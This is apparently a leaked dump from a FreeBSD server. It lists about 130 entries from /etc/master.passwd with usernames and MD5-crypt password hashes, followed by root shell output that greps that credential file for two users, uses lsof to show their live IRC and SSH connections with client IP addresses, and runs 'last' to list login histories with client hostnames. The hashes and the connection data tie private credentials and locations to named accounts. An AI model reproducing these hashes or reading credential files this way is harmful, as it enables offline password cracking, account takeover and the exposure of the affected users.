izedd:*LOCKED*$1$D5UKCjr0$e9soJXXTyUG1Xf5eHHDuZ/:1172:1172::0:0:User &:/home/izedd:/usr/local/bin/bash
chevym4n:$1$K1uoGWl/$rZLwDgLIgr.Xni315uVpX.:1174:1174::0:0:User &:/home/chevym4n:/usr/local/bin/bash
edgein:$1$2Vs.w9gS$mvylnKn4jxg6lsitAbz.i.:1175:1175::0:0:User &:/home/edgein:/usr/local/bin/bash
shoes:$1$e.WxvF9e$UR5G4Q4zBbgMYaRcvKR3L/:1178:1178::0:0:User &:/home/shoes:/usr/local/bin/bash
zenchi:$1$4YSeHXDW$0/Y40Q9iuLRgd0IJKQucc.:1179:1179::0:0:User &:/home/zenchi:/usr/local/bin/bash
darien9:$1$vzP7ScLf$c/x7.w4a8hLqcy/cm.3uk1:1180:1180::0:0:User &:/home/darien9:/usr/local/bin/bash
reaper90:*LOCKED*$1$RdwnqlVZ$u0yfgSk8FCTKkzDb.n3gM1:1181:1181::0:0:User &:/home/reaper90:/usr/local/bin/bash
bnoel:$1$drKh3ET3$.V5pp0CrLCNjMiPuKJxnY1:1183:1183::0:0:User &:/home/bnoel:/usr/local/bin/bash
hts:$1$84Ss/lv8$b51Gx1URnSeNK63ZO8kNZ1:1188:1188::0:0:User &:/home/hts:/usr/local/bin/bash
hw4tbnc:$1$Vh3/g6US$cPnpGhNkNG9BWvCQ3t2Yz/:1190:1190::0:0:User &:/home/hw4tbnc:/usr/local/bin/bash
xavi:$1$9xxNvzQF$drSUfEtQS.QXN1BbuSZAQ/:1192:1192::0:0:User &:/home/xavi:/usr/local/bin/bash
kruapra:$1$Nbcjv9YC$N8ePQ6PSdQHF0U/DKkrkh0:1193:1193::0:0:User &:/home/kruapra:/usr/local/bin/bash
bbblade1:$1$3QdkfReN$LAGYA1xhqAuhcTw0fJWsl0:1197:1197::0:0:User &:/home/bbblade1:/usr/local/bin/bash
oby1:$1$GkQaLc30$6DXwEhSd9QSeDF5FjAVTB0:1198:1198::0:0:User &:/home/oby1:/usr/local/bin/bash
ltootle:$1$QGrHDsUo$Wl.6N3Nm9ev1dK58x.e80/:1199:1199::0:0:User &:/home/ltootle:/usr/local/bin/bash
zime:$1$uiS1oy.Q$WiVC7b9esN7u4IQw9qrsl0:1200:1200::0:0:User &:/home/zime:/usr/local/bin/bash
ksafusi:$1$hEuXZPjD$AxW7YdBYaTfraRpTuLhhs.:1202:1202::0:0:User &:/home/ksafusi:/usr/local/bin/bash
methanl:$1$DDefrWsW$uVtJKR20EYhnrGhL2lgAM0:1205:1205::0:0:User &:/home/methanl:/usr/local/bin/bash
anux:$1$MjMKgFJP$Db/H.GWM0F4V8y6aESFx9/:1206:1206::0:0:User &:/home/anux:/usr/local/bin/bash
tea:$1$XsdcVMWd$6zKH0gChUzxwFW9JWohhU0:1207:1207::0:0:User &:/home/tea:/usr/local/bin/bash
ircjaymz:$1$OQn.DXif$.CQTkWt2WMacpsLiIzTFN/:1210:1210::0:0:User &:/home/ircjaymz:/usr/local/bin/bash
coolcat:$1$Oylm8zdT$1fJ9FuOxsLixvN0Mvi7gv1:1211:1211::0:0:User &:/home/coolcat:/usr/local/bin/bash
zeepysea:$1$3eGKEHR9$zOgqVHLQHdZVHWxVuNJZG0:1213:1213::0:0:User &:/home/zeepysea:/usr/local/bin/bash
darkevil:$1$45g22hpl$DdFBwycNzL3o9D./PKHzf1:1214:1214::0:0:User &:/home/darkevil:/usr/local/bin/bash
grindey:$1$.Y3kkIHc$kKp8DefYIdeekSzixAV4f0:1215:1215::0:0:User &:/home/grindey:/usr/local/bin/bash
silver15:$1$tb0VvKDF$c0SYfPvgceRpkYvTeLE43/:1216:1216::0:0:User &:/home/silver15:/usr/local/bin/bash
smash:$1$jNnzzwU.$p5P3qiiQdK8fh22y8pM2k.:1218:1218::0:0:User &:/home/smash:/usr/local/bin/bash
reznik:$1$NB.AbeQB$woH82mNch0lgffXyGchAU/:1219:1219::0:0:User &:/home/reznik:/usr/local/bin/bash
omelette:*LOCKED*$1$XN1bbL.7$oThuyRVmG09RvI02.4C1I0:1222:1222::0:0:User &:/home/omelette:/usr/local/bin/bash
mimik0r:$1$0XSPv6Su$ZwaXxxlJYHS97/pdN0oy90:1223:1223::0:0:User &:/home/mimik0r:/usr/local/bin/bash
owine:$1$wxGmMtzO$Z3thy5JIjzaffvKpPG9WI/:1224:1224::0:0:User &:/home/owine:/usr/local/bin/bash
manboo:$1$N2gCSmE3$yk.dcCPMq6Y1/ezAac7wu0:1225:1225::0:0:User &:/home/manboo:/usr/local/bin/bash
corley:$1$PvKjpEEr$Vo37apBxJ3eqZqB8OLfaT.:1231:1231::0:0:User &:/home/corley:/usr/local/bin/bash
sqd:$1$OZvYdPVR$FmfB6RtJAzTp1oGmdMCCp1:1233:1233::0:0:User &:/home/sqd:/usr/local/bin/bash
mooo:$1$zEP5oqSf$UbHTr1.JzIn0ey0.DAGn21:1234:1234::0:0:User &:/home/mooo:/usr/local/bin/bash
comedy:$1$z6LpAT1A$nc1/vuEvWdaP/cLqkowCs.:1235:1235::0:0:User &:/home/comedy:/usr/local/bin/bash
lynx:$1$se6yc6Bo$.LQ7e0Q01u3rYovysJR3h1:1236:1236::0:0:User &:/home/lynx:/usr/local/bin/bash
prodigy:$1$RVyb9n7n$.xCux6MDqOIdqJ0st2KOb1:1237:1237::0:0:User &:/home/prodigy:/usr/local/bin/bash
chrirc:$1$2JCsvlHc$i/CQOaTf5gEpM7oFCjDN/.:1238:1238::0:0:User &:/home/chrirc:/usr/local/bin/bash
lyhne1:$1$Kpsj2jtT$sjUGo/h4J2FIkuoqishrw/:1242:1242::0:0:User &:/home/lyhne1:/usr/local/bin/bash
percott1:$1$BjzcMqbu$i3/MQucqGMtCREAcP7W65.:1243:1243::0:0:User &:/home/percott1:/usr/local/bin/bash
djspark:$1$c6xQdKTb$mWggScCvJZiwkdnzpx/Cp/:1244:1244::0:0:User &:/home/djspark:/usr/local/bin/bash
ac1115:$1$XsglBGxw$DyTzTnNO0mOsflnamAukf0:1246:1246::0:0:User &:/home/ac1115:/usr/local/bin/bash
asriel:$1$VbcBqSUx$JEQvA2lwRWPqk.0w11oes/:1247:1247::0:0:User &:/home/asriel:/usr/local/bin/bash
devil:$1$q6WNzUIk$/Qv4J3E.fbG/JE4j.hHAL/:1248:1248::0:0:User &:/home/devil:/usr/local/bin/bash
lymelyte:$1$nqTvcQub$visWqXp3cKGDkwc25KYNl0:1249:1249::0:0:User &:/home/lymelyte:/usr/local/bin/bash
cmm:$1$ekGdXp0j$hUyJVyP3UXWhCOHVtCq/N1:1250:1250::0:0:User &:/home/cmm:/usr/local/bin/bash
nek0o:$1$PUmJEvpa$ZrIV7QV6Qf3GJn5cEOTIu0:1252:1252::0:0:User &:/home/nek0o:/usr/local/bin/bash
baxxta:$1$apBmnTij$hZw5VnHaUpHlSuOIYNfD20:1253:1253::0:0:User &:/home/baxxta:/usr/local/bin/bash
bruhaha:$1$HH2GgFl4$cmXD/bE438EiLmIbJyqdR1:1254:1254::0:0:User &:/home/bruhaha:/usr/local/bin/bash
dv327:$1$MDTcfoUl$154clLyjNZI4qgtQzyrDq/:1258:1258::0:0:User &:/home/dv327:/usr/local/bin/bash
voxitize:$1$DWOR6B.M$ppBHJaNOS4LvRrOhbphX2/:1261:1261::0:0:User &:/home/voxitize:/usr/local/bin/bash
own3d:$1$kCOJh8SJ$KwEe1bJ8e.JS3Nm.xwYb10:1262:1262::0:0:User &:/home/own3d:/usr/local/bin/bash
feed:$1$RHeHyv6H$v1cnIn1fKUwC9k.got3dl.:1264:1264::0:0:User &:/home/feed:/usr/local/bin/bash
yaquis:$1$68F1SID1$b9H5Bbj/fNYsvUhqgpr9Q1:1266:1266::0:0:User &:/home/yaquis:/usr/local/bin/bash
bpunux:$1$SqaNE5JP$bp1vJn3I4Rr6oZ6eJAmvz0:1269:1269::0:0:User &:/home/bpunux:/usr/local/bin/bash
skypilot:$1$0iDevIYV$Oi53AE7YFrB6AaBnAfcn7.:1271:1271::0:0:User &:/home/skypilot:/usr/local/bin/bash
blake96:$1$KwitdaYi$2EyIIukI8gEIxZCHwwj4U.:1272:1272::0:0:User &:/home/blake96:/usr/local/bin/bash
blotch:$1$rYr2mFcV$HPpQFgQacg4ScPjvNfYR31:1274:1274::0:0:User &:/home/blotch:/usr/local/bin/bash
scouse:$1$du5wftbl$lVamWsT/nEKT75D/IelEI/:1275:1275::0:0:User &:/home/scouse:/usr/local/bin/bash
mogle3:$1$Fo7FY4Sw$ioqHiMhZ/8BBDZjg39BR41:1276:1276::0:0:User &:/home/mogle3:/usr/local/bin/bash
ste:$1$H4hxohFI$se6RPLcCpkl/LY4aUiov6.:1277:1277::0:0:User &:/home/ste:/usr/local/bin/bash
omgwtf:$1$eK9d4q9r$eCZMCR.GRqmt6oOhrbam11:1281:1281::0:0:User &:/home/omgwtf:/usr/local/bin/bash
brosb4:$1$NQd5q63M$62LY3LnPxuPbrBmTANOkm1:1283:1283::0:0:User &:/home/brosb4:/usr/local/bin/bash
mindben:$1$xrm2x1nF$DnA.Wkg4q9ImdLOA75IT00:1284:1284::0:0:User &:/home/mindben:/usr/local/bin/bash
hixk:$1$p2dRk8OC$XpC/2o0jwotue0Tmbdr3R0:1286:1286::0:0:User &:/home/hixk:/usr/local/bin/bash
omen:$1$eT86NXcE$.ouer9/Fp/lv04NAhli5a1:1287:1287::0:0:User &:/home/omen:/usr/local/bin/bash
sakik1:$1$PujiBsEC$Syl3nyJzAObvu2UcpfbVd/:1290:1290::0:0:User &:/home/sakik1:/usr/local/bin/bash
chriys:$1$R0.IBcw2$VILPHOKDvQts2eyy6ndoK0:1291:1291::0:0:User &:/home/chriys:/usr/local/bin/bash
jtracy:$1$RxPgmSPJ$/O7J8PYHUMZHIx/4hJ0XE0:1292:1292::0:0:User &:/home/jtracy:/usr/local/bin/bash
roodyk:$1$0Bo4ZY89$ray17Ga4HpE2QtaFiHOg11:1293:1293::0:0:User &:/home/roodyk:/usr/local/bin/bash
qfx:$1$miBfwHok$ODKoxjFkZSYxfQqzQX96A1:1295:1295::0:0:User &:/home/qfx:/usr/local/bin/bash
chrisdad:$1$hurRNkwG$V8PUznOwFheCuU6TCWic4.:1296:1296::0:0:User &:/home/chrisdad:/usr/local/bin/bash
rice21:$1$nB9dgK9c$XmTcPL/ig7xDxT1iIbY4..:1298:1298::0:0:User &:/home/rice21:/usr/local/bin/bash
wchan21:$1$Ia3.DKEB$oTtcBvRdagIb59HbVfc3l0:1299:1299::0:0:User &:/home/wchan21:/usr/local/bin/bash
xkelsx:$1$iWNCktLQ$F37FwcA8XlJuiSk0RqB1p1:1300:1300::0:0:User &:/home/xkelsx:/usr/local/bin/bash
jerryste:$1$lUhhapJy$Hi6dQ4ToW6xAPMjfK5bBS1:1302:1302::0:0:User &:/home/jerryste:/usr/local/bin/bash
pbx:$1$Ln.hfEBz$k/Q1E0leCS9T.gLaPPpBA.:1303:1303::0:0:User &:/home/pbx:/usr/local/bin/bash
mlh:$1$9kndvAsu$/kIT6xRBCsb8nf8.m0kPV.:1307:1307::0:0:User &:/home/mlh:/usr/local/bin/bash
howell1:$1$Vtbi5SB.$w6W4pZ/Pc/TfPA0y0jod4/:1308:1308::0:0:User &:/home/howell1:/usr/local/bin/bash
djkarl:$1$aEJTRbAG$3eWTZQ4CgwGbHbAfHHl4P.:1309:1309::0:0:User &:/home/djkarl:/usr/local/bin/bash
subkult:$1$2QPeEVKb$bCL0KYncuAGfIO4FKWW3N1:1310:1310::0:0:User &:/home/subkult:/usr/local/bin/bash
dealer:$1$mITFxoNU$lJtxGqUo2K4rE6/PYLYCg/:1311:1311::0:0:User &:/home/dealer:/bin/sh
cont:$1$Hl1DCBfm$HO43dbNlGn6TZvo/F2zTH0:1312:1312::0:0:User &:/home/cont:/usr/local/bin/bash
ircusr:$1$X1181Xd3$524I5czvIWxCkduxRuKhk1:1313:1313::0:0:User &:/home/ircusr:/usr/local/bin/bash
lordy:$1$y5CwHmRO$PZRJ/aY7BtMqY9FagatZR1:1314:1314::0:0:User &:/home/lordy:/usr/local/bin/bash
chozen1:$1$qc4UoXsN$U/YTbetNKaZ/RwEYpWOdP1:1315:1315::0:0:User &:/home/chozen1:/usr/local/bin/bash
nardi:$1$ttRgdp5X$kq1Gb/4FPSmGdbiYBEwt1/:1316:1316::0:0:User &:/home/nardi:/usr/local/bin/bash
ssaws:*LOCKED*$1$.qT8FvGI$l60rRjSoGgG699wR51Ie/0:1317:1317::0:0:User &:/home/ssaws:/usr/local/bin/bash
chaos1:$1$hgGtAmCk$BzvUVeU8f38CKZPr4CcZ/1:1318:1318::0:0:User &:/home/chaos1:/usr/local/bin/bash
jax66:$1$4TWJjUIH$Pm/erJRmRgc01FCVakDfB.:1319:1319::0:0:User &:/home/jax66:/usr/local/bin/bash
paleride:$1$ahPjbJV5$g63Rwng/2D9rKeK0bIwdx.:1320:1320::0:0:User &:/home/paleride:/usr/local/bin/bash
kokoryu:$1$NVQwZzru$VjR4eW9CGrT.YF6nh72Ke0:1321:1321::0:0:User &:/home/kokoryu:/usr/local/bin/bash
bluewish:$1$rQtdB28x$5bGykkOQ8gr5lx1qHYlRs1:1322:1322::0:0:User &:/home/bluewish:/usr/local/bin/bash
grumpy:$1$o.biiCj3$5AG9SpDJjbNUSSnnJ92uc.:1323:1323::0:0:User &:/home/grumpy:/usr/local/bin/bash
jaiven:$1$y.IDqqL3$u7netp1tGxbhjKfbd6XTO0:1324:1324::0:0:jusam69:/home/jaiven:/usr/local/bin/bash
rikt:$1$Fjry.jO8$9hNprEmsN9GLULLeZvb.o1:1325:1325::0:0:User &:/home/rikt:/usr/local/bin/bash
sal:$1$AuSJnmDL$YSdEP0KfVzRRVCiyhnnhj.:1326:1326::0:0:User &:/home/sal:/usr/local/bin/bash
lailoke:$1$EC6X0Zz.$DdVRj0ju8ua4DKMFCAFUo/:1327:1327::0:0:User &:/home/lailoke:/usr/local/bin/bash
kingzy:$1$qm46wwsJ$QNk/qT5dDS2bXr87qZpMi0:1328:1328::0:0:User &:/home/kingzy:/usr/local/bin/bash
delion1:$1$awK8R.nN$0GCL5dcuK1cirjfudAqHY0:1329:1329::0:0:User &:/home/delion1:/usr/local/bin/bash
vietnigh:$1$FdwjedVt$tmUPUlfiHYr/bTUivlFn01:1330:1330::0:0:User &:/home/vietnigh:/usr/local/bin/bash
darkuno3:$1$L9VYcl3k$mIQ9ahiFi0Sy0Oc8re8TM0:1331:1331::0:0:User &:/home/darkuno3:/usr/local/bin/bash
mae21:$1$aVUu0DTg$jvYomCsK1cewfLWHurOlv0:1332:1332::0:0:User &:/home/mae21:/usr/local/bin/bash
redrum:$1$WFOWXv8b$Rqxxha5.d8WjszhU0AKXC.:1333:1333::0:0:User &:/home/redrum:/usr/local/bin/bash
cpu:$1$tjEDjNz1$e6.aktoZ6oizYft1eyXMp.:1334:1334::0:0:User &:/home/cpu:/usr/local/bin/bash
cassand:$1$hZgXLQbv$uE7b8oM88z9qjqhFwka7X/:1335:1335::0:0:User &:/home/cassand:/usr/local/bin/bash
nyakz:$1$yGPbLpHT$cIcqvBVPmI6fjG9cilKu7/:1336:1336::0:0:User &:/home/nyakz:/usr/local/bin/bash
ioplex:$1$FSJ1qmmR$zFt5TGcDNeAQOcWCiWQZq0:1337:1337::0:0:User &:/home/ioplex:/usr/local/bin/bash
dasboot:$1$PgS728fU$IfecoKOgPjuVFep1GIesx.:1338:1338::0:0:User &:/home/dasboot:/usr/local/bin/bash
visage:$1$jGAd8QtY$Fi4fFEemJYjj0/gu9oDDc1:1339:1339::0:0:User &:/home/visage:/usr/local/bin/bash
brosco:$1$kpHOwub.$2odvLK5iEXASTkwbcuilY0:1340:1340::0:0:User &:/home/brosco:/usr/local/bin/bash
mrts:$1$f8026tqY$cxdY57bGxA11PdflJBaET/:1341:1341::0:0:User &:/home/mrts:/usr/local/bin/bash
qberto:$1$qprEj3J4$VzXPUlgGqiKKlZIml3M8y/:1342:1342::0:0:User &:/home/qberto:/usr/local/bin/bash
kooner:$1$Kl19GSGx$ZjpFwBynWbIT40iEkCfxg/:1343:1343::0:0:User &:/home/kooner:/usr/local/bin/bash
matt:$1$Mj6LerXV$SnwLvGTJI5hQbZLi7ho96/:1344:1344::0:0:User &:/home/matt:/usr/local/bin/bash
alexbb:$1$6LLUjutX$OiYpyvVAi60xC2sFVA4OP0:1345:1345::0:0:User &:/home/alexbb:/usr/local/bin/bash
psycoz:$1$UgwFHV0f$4/V6NqEuYTJL2GwpfwjYb.:1346:1346::0:0:User &:/home/psycoz:/usr/local/bin/bash
brex132:$1$lhno75FQ$L5fsLgcdEObDqCp55rkQn/:1347:1347::0:0:User &:/home/brex132:/usr/local/bin/bash
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
[root@velocity:/var/run]# 

[root@velocity:/]# cat /etc/master.passwd | grep romeo
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
[root@velocity:/]# cat /etc/master.passwd | grep pimpinjg
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash


[root@velocity:/]# lsof -i -n | grep romeo
irssi     32525      romeo    3u  IPv4 0xcc67d000      0t0  TCP 72.20.28.205:53881->71.6.199.68:ircd (ESTABLISHED)
irssi     32525      romeo    4u  IPv4 0xc9254740      0t0  TCP 72.20.28.205:53882->66.225.223.70:ircd (ESTABLISHED)
irssi     32525      romeo    5u  IPv4 0xc9c76cb0      0t0  TCP 72.20.28.205:53883->94.102.58.212:ircd (ESTABLISHED)
irssi     32525      romeo   20u  IPv4 0xc5bf1ae0      0t0  TCP 72.20.28.205:54464->67.203.77.67:ircd (ESTABLISHED)
sshd      83595      romeo    3u  IPv4 0xc58a23a0      0t0  TCP 72.20.28.248:ssh->188.50.41.73:56764 (ESTABLISHED)
[root@velocity:/]# lsof -i -n | grep pimpinjg
sshd      82325   pimpinjg    3u  IPv4 0xc5480000      0t0  TCP 72.20.28.248:ssh->76.175.20.182:55028 (ESTABLISHED)


[root@velocity:~]# last
katsst           ttyp2    adsl-76-240-177- Tue Jun 23 18:34 - 19:04  (00:30)
katsst           ttyp2    adsl-76-240-177- Tue Jun 23 18:13 - 18:33  (00:20)
katsst           ttyp2    adsl-76-240-177- Tue Jun 23 17:13 - 17:43  (00:30)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:47   still logged in
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42  (00:05)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43  (00:06)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32  (01:12)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36  (01:20)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10  (02:10)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25  (00:42)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59  (00:07)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43  (00:28)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14  (00:02)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07  (00:04)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14  (00:28)
alexbb           ttypd    53551eb9.cable.c Tue Jun 23 00:29 - 00:29  (00:00)
katsst           ttypf    cpe-75-84-149-5. Mon Jun 22 23:35 - 00:05  (00:30)
katsst           ttypd    cpe-75-84-149-5. Mon Jun 22 23:15 - 23:35  (00:19)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05  (00:50)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14  (00:07)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54  (00:31)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36  (00:00)
blkgraz          ttypf    cpe-66-25-54-163 Mon Jun 22 17:41 - 23:35  (05:53)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24  (00:43)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37  (00:24)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19  (00:33)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40  (00:02)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49  (00:19)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26  (00:05)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12  (00:08)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03  (00:02)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00  (00:04)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55  (00:11)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12  (00:03)
pimpinjg         ttypf    cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06  (00:00)
katsst           ttypd    cpe-75-84-149-5. Mon Jun 22 02:44 - 03:14  (00:30)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33  (00:01)
katsst           ttypg    cpe-75-84-149-5. Mon Jun 22 00:20 - 00:50  (00:30)
hts              ttypf    pool-71-114-161- Mon Jun 22 00:15 - 00:49  (00:33)
smash            ttypd    c-98-232-250-179 Sun Jun 21 22:54 - 01:28  (02:34)
chaos1           ttypd    c-69-143-254-180 Sun Jun 21 22:06 - 22:09  (00:03)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48  (00:50)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51  (00:16)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23  (00:16)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25  (00:03)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08  (00:06)
apo              ttypd    d75-152-200-195. Sun Jun 21 15:03 - 15:26  (00:22)
apo              ttypd    d75-152-200-195. Sun Jun 21 15:03 - 15:03  (00:00)
kokoryu          ftp      82-45-111-232.c  Sun Jun 21 13:43 - 13:54  (00:10)
cazz1961         ttypd    5ad95c74.bb.sky. Sun Jun 21 06:09 - 06:40  (00:30)
ste              ttype    doc-24-32-94-198 Sat Jun 20 20:50 - 21:21  (00:30)
matt             ttypd    71.81.144.135    Sat Jun 20 19:27 - 20:00  (00:32)
matt             ftp      71.81.144.135    Sat Jun 20 19:24 - 19:30  (00:06)
matt             ttypd    71.81.144.135    Sat Jun 20 18:09 - 18:46  (00:36)
matt             ftp      71.81.144.135    Sat Jun 20 17:19 - 17:24  (00:05)
matt             ttypd    71.81.144.135    Sat Jun 20 17:06 - 17:56  (00:50)
matt             ftp      71.81.144.135    Sat Jun 20 17:04 - 17:09  (00:05)
matt             ftp      71.81.144.135    Sat Jun 20 16:56 - 17:02  (00:05)
yaquis           ttypd    ip72-223-92-235. Sat Jun 20 16:35 - 17:05  (00:30)
pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29  (00:10)
brosco           ftp      99-19-91-167.li  Sat Jun 20 14:22 - 14:23  (00:01)
brosco           ftp      99-19-91-167.li  Sat Jun 20 14:17 - 14:22  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 14:12 - 14:16  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 14:06 - 14:11  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 14:01 - 14:06  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:56 - 14:01  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:51 - 13:56  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:46 - 13:50  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:40 - 13:45  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:35 - 13:40  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:30 - 13:35  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:25 - 13:30  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:20 - 13:25  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:15 - 13:19  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:09 - 13:14  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 13:04 - 13:09  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:59 - 13:04  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:54 - 12:59  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:49 - 12:54  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:44 - 12:48  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:38 - 12:43  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:33 - 12:38  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:28 - 12:33  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:23 - 12:28  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:18 - 12:23  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:13 - 12:17  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:07 - 12:12  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 12:02 - 12:07  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:57 - 12:02  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:52 - 11:57  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:47 - 11:51  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:41 - 11:46  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:36 - 11:41  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:31 - 11:36  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:26 - 11:31  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:21 - 11:26  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:16 - 11:20  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:10 - 11:15  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:05 - 11:10  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 11:00 - 11:05  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:55 - 11:00  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:50 - 10:55  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:45 - 10:49  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:39 - 10:44  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:34 - 10:39  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:29 - 10:34  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:24 - 10:29  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:19 - 10:24  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:14 - 10:18  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:08 - 10:13  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 10:03 - 10:08  (00:04)
brosco           ftp      99-19-91-167.li  Sat Jun 20 09:58 - 10:03  (00:04)
